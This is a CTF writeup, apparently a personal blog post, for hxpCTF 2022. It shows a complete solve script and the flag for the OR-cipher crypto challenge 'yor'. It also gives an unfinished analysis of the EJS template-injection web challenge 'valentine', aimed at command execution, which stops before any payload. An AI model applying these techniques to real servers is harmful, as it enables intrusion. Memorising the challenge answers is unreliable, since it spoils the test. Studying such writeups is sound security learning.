index.html

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta property="og:type" content="website">
<meta property="og:title" content="sixxx1 | blog">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="sixxx1 | blog">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="sixxx1">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : true,
    isPost : false,
    lang   : 'en'
  };
</script>

  <title>sixxx1 | blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">sixxx1 | blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content index posts-expand">
            
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/03/15/hxpctf-2022/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="sixxx1">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sixxx1 | blog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2023/03/15/hxpctf-2022/" class="post-title-link" itemprop="url">hxpctf 2022 部分writeup</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2023-03-15 14:01:58 / Modified: 15:57:44" itemprop="dateCreated datePublished" datetime="2023-03-15T14:01:58+08:00">2023-03-15</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="Crypto-yor"><a href="#Crypto-yor" class="headerlink" title="[Crypto] yor"></a>[Crypto] yor</h1><h2 id="0x00-题目说明"><a href="#0x00-题目说明" class="headerlink" title="0x00 题目说明"></a>0x00 <strong>题目说明</strong></h2><p>XOR is so last year (just like this CTF).</p>
<p>Introducing YOR.</p>
<p><strong>题目附件</strong></p>
<p>Download: <a target="_blank" rel="noopener" href="https://2022.ctf.link/assets/files/yor-de99ca0309bcf72b.tar.xz">yor-de99ca0309bcf72b.tar.xz (12.7 KiB)</a></p>
<p>Connection (mirrors): nc 167.235.26.48 10101</p>
<h2 id="0x01-解题思路"><a href="#0x01-解题思路" class="headerlink" title="0x01 解题思路"></a><strong>0x01 解题思路</strong></h2><p>分析加密流程：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"></span><br><span class="line">greets = [</span><br><span class="line">    <span class="string">&quot;Herzlich willkommen! Der Schlüssel ist &#123;0&#125;, und die Flagge lautet &#123;1&#125;.&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Bienvenue! Le clé est &#123;0&#125;, et le drapeau est &#123;1&#125;.&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Hartelijk welkom! De sleutel is &#123;0&#125;, en de vlag luidt &#123;1&#125;.&quot;</span>,</span><br><span class="line">    <span class="string">&quot;ようこそ！鍵は&#123;0&#125;、旗は&#123;1&#125;です。&quot;</span>,</span><br><span class="line">    <span class="string">&quot;歡迎！鑰匙是&#123;0&#125;，旗幟是&#123;1&#125;。&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Witamy! Niestety nie mówię po polsku...&quot;</span>,</span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">flag = <span class="built_in">open</span>(<span class="string">&#x27;flag.txt&#x27;</span>).read().strip()</span><br><span class="line"><span class="keyword">assert</span> <span class="built_in">set</span>(flag.encode()) &lt;= <span class="built_in">set</span>(<span class="built_in">range</span>(<span class="number">0x20</span>,<span class="number">0x7f</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># key 是随机 16 字节</span></span><br><span class="line">key = <span class="built_in">bytes</span>(random.randrange(<span class="number">256</span>) <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">16</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 从 greets 中随机选一个，内容里面拼接了 key 和 flag</span></span><br><span class="line">hello = random.choice(greets).<span class="built_in">format</span>(key.<span class="built_in">hex</span>(), flag).encode()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 将 hello 和 key 每个字节做逻辑或运算，生成结果</span></span><br><span class="line">output = <span class="built_in">bytes</span>(y | key[i%<span class="built_in">len</span>(key)] <span class="keyword">for</span> i,y <span class="keyword">in</span> <span class="built_in">enumerate</span>(hello))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(output.<span class="built_in">hex</span>())</span><br></pre></td></tr></table></figure>

<p>重点应该是最后的output，在进行或运算的时候，能否做可逆运算，才能还原出flag。</p>
<p>想了一下，假设每次选的greet是固定的，是不是就能通过多组output的AND运算来还原出hello。</p>
<h2 id="0x02-获得flag"><a href="#0x02-获得flag" class="headerlink" title="0x02 获得flag"></a>0x02 获得flag</h2><p>先用pwntools获得多组数据</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">RES = []</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">50</span>):</span><br><span class="line">    io = remote(<span class="string">&#x27;167.235.26.48&#x27;</span>, <span class="number">10101</span>)</span><br><span class="line">    res = io.recv()</span><br><span class="line">    <span class="built_in">print</span>(res)</span><br><span class="line">    RES.append(res)</span><br><span class="line">    io.close()</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(RES)</span><br></pre></td></tr></table></figure>

<p>取相同长度的一组数据，然后进行AND操作</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">l = [<span class="string">&#x27;4a6976fceffdfcb3ebec7f7d6d6fffef636866fdaafbfc77f7fc7f7d6d6ff7a2767a36fcbabffe73bbed7f796f6ff5b37a7b67ffbbffbf3bb7ec3f7d6f7efcb26e6867feaafdfd33f7ec7f7f6d6ef5eb667c26fcfaf9ff57ebdd5f7d6d7ef7ce735f66fcfafffc33d3df7f7f7f7ff4f75f4b36fedff9bc77b3df5f797f7fffbf7f7d2e&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;4af7767d7fecd6ff6bf5fffdec7f7fed63b7467d3ef3feef7df5fffdac7d7be876b73f3f3eb6f7ff7bf5fbbdec3e7fed76bf663d7ee2ffee69f7fbffbd7e7ff86eb7677f3ee4f7ee7efdfbffac7c7fe966f726797ef0ffff68dddfbded7c3fec73df66397effdefe7adffbdfff7d3bfd5fd7367f7fe8f6fe7bdfdbbdfe3f3fff7fff2e&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;4ef1f67fe7fdc7bf7f7477efec6f7f7f27b0f46fa7f3efef757477efac6f777b36b6f67fe7b5b7ee75777bbfbc3f7e7f37b5f77fb7b3e3ee757772efbd3f777b2eb0f56fa7f5e7ae777c73efac6f777b66f4f46ffff1fbdf7d7d7fbfed7f777f37fff67ff7dfdbbe577f7befff7f767f5ff3f46ffff9b7fe377f7bbffe3f7f7f3ffdfe&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;5fedff76e5eed6b77b7a7f7f6d6bef6d7fecdd67e4fb7e65757e6d7f296bff247feefd67fdee3637757e697b3933bc357ffdbd67f6ba3367337b383b6963bc347fecfd6ee4ee7725777e697f296ffd6d7ffcbd6efcfa7b57795b7f3f6d77bf4c7fffff76f6ff5a35535f697f7f7bbc755fefbd6effea3677335f793b7b3fbf3f7ffdbf&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;697ffa767d7dd5ff7f3bf7edfdff7fed617eec67787bfd7f777ff7ecf5fd73a9777fff677d79b77e373bb7b9fdf537ed737efb627a7fbd7e763ff7bdf5f73bb96d7eed6e787df57e767ff7eff5fd77e9657ee86a7879ff7f7e7bffbdf5f537cd737fee327a7fdd7e767fffcefffd33fd7f7ffc6e7f79b57e377fffb8f7ff3fbf7f7fee&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;6cef7bfde7fdf5b77fb47f7f7c6bef6d65ae5dfda7ff7df575f47d7e3869fb2c76be39fdb7bd77bd75b77f7e3f71b93d75be7bfdb7fd77f535bc3f7b3879b86f6cae7dffa7fd75b576fc7d7f386dfd6d64fe39f9fffd7bd77cfd7f7f7d75bf4c77df7ff9f7ff79b556ff7d7e5f79b87d7fcf3dfffffd75f737ff7d7a5a7fbf3f7fff3f&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;ca69777e656ed7b37b3e77f5ee7bef6deb69457f257f7f77757e75fcea7bf32ceb69373b353f7373333f72f5ff33b33efb79377f373e7336757f73b6eb33b36fee69657e256e7732777e71f7ea7ef76dee7d257a7d7e7b77797f7fb5ef76b74cfb7f673a777f5b32537f79f6ff7bb37ddf6b357e7f6e7776337f79b4fa3fbf3fff7d2f&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;cb6ffb7767eee7f7ebec77f7ffff6f6deb2fcf6763fbefe7fffc77feb3ff7b28eb6ffb6763eab7f7feff73f7f3f76f3eeb6fef6377bae7f6fbff76b7b3f73a38ef2fef6f63eee7e6feec73f7b3ff7f69ef7feb6b7bfafff7eafd7fb7f7f73f4cfb7fef3373fffff6daff7bf6dfff3a7ddf6fff6f7feab7f6fbff7bb6d3ff3f3fff7fef&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;d8ef73fcf5fcf6ff7fee77e57fff7f6df9ae75fdf5f3fe6d77fe67ed3bfd7b2cfcbe39fdf7b1f27c76ff63b17ff67f6ff9be73fdf7b3fa7d37ee67b53ffd7b6ffcae75fef5f4f76c76ee63e73bfc7d6dfcfe31f8fdf0fb7f7edf7fb57ff47f6cfbdf77b8f7fffa7c56df6bc75ffd797ddfcf35fedff8f67e37df7bb15bff7f3fffff3f&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;fa7b7ff57ffde6b3eb637fed7f7b6ffdb33a4df53fffee75ff776fec3b7b7bb1f23a7ff13ffde631fb676eec7b7a7bb1f37b7df33ffde339fb637fe93f7a7bb1be3a6dff3ffde731fe6f6bef3b7e7ff9f67e6df97ffdfb77ea5b5ffd7f7e7fddb37f6ff17fdffa31da5f6bce7f7b7bf5ff7b7dff5ffdb677fb5f5bf87b7f7fbfbf7f6f&#x27;</span>,</span><br><span class="line"><span class="string">&#x27;fe75f7f667fcd6ffefb7f7f5ff7b7fedb775d7f727f7fe7ffff7f5fcb37b77ecf677b7f73ff7f67ebfb7f5f4f73377edf777f7f73ff5f67ebfb7b3f3b73777efbe75f7fe27f4f77efffff1f7b37f77edf675b7fa7ff4fb7fefffdff5f77777ccb75ff7f277dfda7efffff9f6df7b76fdff57b7fe7ffcf67ebfffd9f0d33f7fffbf7dbf&#x27;</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">flag  = <span class="built_in">bytes</span>.fromhex(l[<span class="number">0</span>])</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> l:</span><br><span class="line">    row = <span class="built_in">bytes</span>.fromhex(i)</span><br><span class="line">    cc = []</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(row)):</span><br><span class="line">        cc.append(row[j] &amp; flag[j])</span><br><span class="line">    flag = <span class="built_in">bytes</span>(cc)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(flag.decode())</span><br></pre></td></tr></table></figure>

<p><img src="./1678505379152-c92cc64d-7495-4193-873c-46d1090cefc8.png" alt="img"></p>
<p>flag：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hxp&#123;WhY_5et7L3_f0r_X0R_iF_y0u_C4n_h4v3_Y0R????&#125;</span><br></pre></td></tr></table></figure>

<hr>
<h1 id="Web-valentine"><a href="#Web-valentine" class="headerlink" title="[Web] valentine"></a>[Web] valentine</h1><h2 id="0x00-题目说明-1"><a href="#0x00-题目说明-1" class="headerlink" title="0x00 题目说明"></a><strong>0x00 题目说明</strong></h2><blockquote>
<p> 题目来自 hxpCTF 2022，Web - valentine</p>
</blockquote>
<p>题目描述：</p>
<p>Create an awesome template for your valentine and share it with the world!</p>
<p>题目附件：</p>
<p>Download: <a target="_blank" rel="noopener" href="https://2022.ctf.link/assets/files/valentine-9455b10a15fc5519.tar.xz">valentine-9455b10a15fc5519.tar.xz (12.4 KiB)</a></p>
<p>Connection (mirrors): <a target="_blank" rel="noopener" href="http://91.107.238.232:9086/">http://91.107.238.232:9086</a></p>
<h2 id="0x01-题目代码"><a href="#0x01-题目代码" class="headerlink" title="0x01 题目代码"></a>0x01 题目代码</h2><p>是一个 nodejs 的环境，提供了以下几个接口：</p>
<ul>
<li>POST /template：创建一个ejs模版文件，文件内容由tmpl参数指定，tmpl参数用户可控但存在一些条件，文件随机命名。</li>
<li>GET /[UUID]：访问用户创建的ejs模版，忽略后缀。可以传递name参数。</li>
<li>GET /：访问首页</li>
</ul>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// node app.js</span></span><br><span class="line"><span class="keyword">var</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>);</span><br><span class="line"><span class="keyword">var</span> bodyParser = <span class="built_in">require</span>(<span class="string">&#x27;body-parser&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> crypto = <span class="built_in">require</span>(<span class="string">&quot;crypto&quot;</span>);</span><br><span class="line"><span class="keyword">var</span> path = <span class="built_in">require</span>(<span class="string">&#x27;path&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> fs = <span class="built_in">require</span>(<span class="string">&#x27;fs&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> app = express();</span><br><span class="line">viewsFolder = path.join(__dirname, <span class="string">&#x27;views&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!fs.existsSync(viewsFolder)) &#123;</span><br><span class="line">  fs.mkdirSync(viewsFolder);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">app.set(<span class="string">&#x27;views&#x27;</span>, viewsFolder);</span><br><span class="line">app.set(<span class="string">&#x27;view engine&#x27;</span>, <span class="string">&#x27;ejs&#x27;</span>);</span><br><span class="line"></span><br><span class="line">app.use(bodyParser.urlencoded(&#123; <span class="attr">extended</span>: <span class="literal">false</span> &#125;))</span><br><span class="line"></span><br><span class="line">app.post(<span class="string">&#x27;/template&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">let</span> tmpl = req.body.tmpl;</span><br><span class="line">  <span class="keyword">let</span> i = -<span class="number">1</span>;</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">while</span>((i = tmpl.indexOf(<span class="string">&quot;&lt;%&quot;</span>, i+<span class="number">1</span>)) &gt;= <span class="number">0</span>) &#123; </span><br><span class="line">    <span class="keyword">if</span> (tmpl.substring(i, i+<span class="number">11</span>) !== <span class="string">&quot;&lt;%= name %&gt;&quot;</span>) &#123;</span><br><span class="line">      res.status(<span class="number">400</span>).send(&#123;<span class="attr">message</span>:<span class="string">&quot;Only &#x27;&lt;%= name %&gt;&#x27; is allowed.&quot;</span>&#125;);</span><br><span class="line">      <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">let</span> uuid;</span><br><span class="line">  <span class="keyword">do</span> &#123;</span><br><span class="line">    uuid = crypto.randomUUID();</span><br><span class="line">  &#125; <span class="keyword">while</span> (fs.existsSync(<span class="string">`views/<span class="subst">$&#123;uuid&#125;</span>.ejs`</span>))</span><br><span class="line"></span><br><span class="line">  <span class="keyword">try</span> &#123;</span><br><span class="line">    fs.writeFileSync(<span class="string">`views/<span class="subst">$&#123;uuid&#125;</span>.ejs`</span>, tmpl);</span><br><span class="line">  &#125; <span class="keyword">catch</span>(err) &#123;</span><br><span class="line">    res.status(<span class="number">500</span>).send(<span class="string">&quot;Failed to write Valentine&#x27;s card&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">let</span> name = req.body.name ?? <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">  <span class="keyword">return</span> res.redirect(<span class="string">`/<span class="subst">$&#123;uuid&#125;</span>?name=<span class="subst">$&#123;name&#125;</span>`</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">&#x27;/:template&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">let</span> query = req.query;</span><br><span class="line">  <span class="keyword">let</span> template = req.params.template</span><br><span class="line">  <span class="keyword">if</span> (!<span class="regexp">/^[0-9A-F]&#123;8&#125;-[0-9A-F]&#123;4&#125;-[4][0-9A-F]&#123;3&#125;-[89AB][0-9A-F]&#123;3&#125;-[0-9A-F]&#123;12&#125;$/i</span>.test(template)) &#123;</span><br><span class="line">    res.status(<span class="number">400</span>).send(<span class="string">&quot;Not a valid card id&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (!fs.existsSync(<span class="string">`views/<span class="subst">$&#123;template&#125;</span>.ejs`</span>)) &#123;</span><br><span class="line">    res.status(<span class="number">400</span>).send(<span class="string">&#x27;Valentine\&#x27;s card does not exist&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (!query[<span class="string">&#x27;name&#x27;</span>]) &#123;</span><br><span class="line">    query[<span class="string">&#x27;name&#x27;</span>] = <span class="string">&#x27;&#x27;</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> res.render(template, query);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">&#x27;/&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> res.sendFile(<span class="string">&#x27;./index.html&#x27;</span>, &#123;<span class="attr">root</span>: __dirname&#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.listen(process.env.PORT || <span class="number">3000</span>);</span><br></pre></td></tr></table></figure>

<p>同时留意到题目给的 Dockerfile 文件中，对 <code>flag.txt</code> 设置了权限，要直接读到 <code>/flag.txt</code> 是不太可能了，最终应当要实现任意命令执行，才能执行 <code>/readflag</code>。</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">RUN</span><span class="bash"> chown root:root /flag.txt &amp;&amp; chmod 400 /flag.txt</span></span><br><span class="line"><span class="keyword">RUN</span><span class="bash"> chown root:root /readflag &amp;&amp; chmod 4555 /readflag</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">EXPOSE</span> <span class="number">3000</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">USER</span> node</span><br><span class="line"><span class="keyword">CMD</span><span class="bash"> node app.js</span></span><br></pre></td></tr></table></figure>

<h2 id="0x02-漏洞分析"><a href="#0x02-漏洞分析" class="headerlink" title="0x02 漏洞分析"></a>0x02 漏洞分析</h2><p>从 EJS 语法来看，所有标签的开头都需要有 <code>&lt;%</code>，在EJS的语法中也会进行正则匹配，会对以下关键词进行解析。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// https://github.com/mde/ejs/blob/main/lib/ejs.js</span></span><br><span class="line"><span class="keyword">var</span> _REGEX_STRING = <span class="string">&#x27;(&lt;%%|%%&gt;|&lt;%=|&lt;%-|&lt;%_|&lt;%#|&lt;%|%&gt;|-%&gt;|_%&gt;)&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>但是只要 tmpl 的内容出现 <code>&lt;%</code>，题目中要求只能是 <code>&lt;%= name %&gt;</code>，这就阻止了其他代码注入的可能性，只能另寻出路，找其他漏洞点。</p>
<p>关注到后面这一块代码：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">app.get(<span class="string">&#x27;/:template&#x27;</span>, <span class="function"><span class="keyword">function</span>(<span class="params">req, res</span>) </span>&#123;</span><br><span class="line">    </span><br><span class="line">  <span class="comment">// ......</span></span><br><span class="line">    </span><br><span class="line">  <span class="keyword">if</span> (!query[<span class="string">&#x27;name&#x27;</span>]) &#123;</span><br><span class="line">    query[<span class="string">&#x27;name&#x27;</span>] = <span class="string">&#x27;&#x27;</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> res.render(template, query);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>在一度没有思路的情况下，去看了下 ejs 库的 README.md，有这样一种用法，是关于自定义分隔符的：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">## Custom delimiters</span></span><br><span class="line"></span><br><span class="line">Custom delimiters can be applied on a per-template basis, or globally:</span><br><span class="line"></span><br><span class="line"><span class="code">```javascript</span></span><br><span class="line"><span class="code">let ejs = require(&#x27;ejs&#x27;),</span></span><br><span class="line"><span class="code">    users = [&#x27;geddy&#x27;, &#x27;neil&#x27;, &#x27;alex&#x27;];</span></span><br><span class="line"><span class="code"></span></span><br><span class="line"><span class="code">// Just one template</span></span><br><span class="line"><span class="code">ejs.render(&#x27;&lt;p&gt;[?= users.join(&quot; | &quot;); ?]&lt;/p&gt;&#x27;, &#123;users: users&#125;, &#123;delimiter: &#x27;?&#x27;, openDelimiter: &#x27;[&#x27;, closeDelimiter: &#x27;]&#x27;&#125;);</span></span><br><span class="line"><span class="code">// =&gt; &#x27;&lt;p&gt;geddy | neil | alex&lt;/p&gt;&#x27;</span></span><br><span class="line"><span class="code"></span></span><br><span class="line"><span class="code">// Or globally</span></span><br><span class="line"><span class="code">ejs.delimiter = &#x27;?&#x27;;</span></span><br><span class="line"><span class="code">ejs.openDelimiter = &#x27;[&#x27;;</span></span><br><span class="line"><span class="code">ejs.closeDelimiter = &#x27;]&#x27;;</span></span><br><span class="line"><span class="code">ejs.render(&#x27;&lt;p&gt;[?= users.join(&quot; | &quot;); ?]&lt;/p&gt;&#x27;, &#123;users: users&#125;);</span></span><br><span class="line"><span class="code">// =&gt; &#x27;&lt;p&gt;geddy | neil | alex&lt;/p&gt;&#x27;</span></span><br><span class="line"><span class="code">```</span></span><br></pre></td></tr></table></figure>

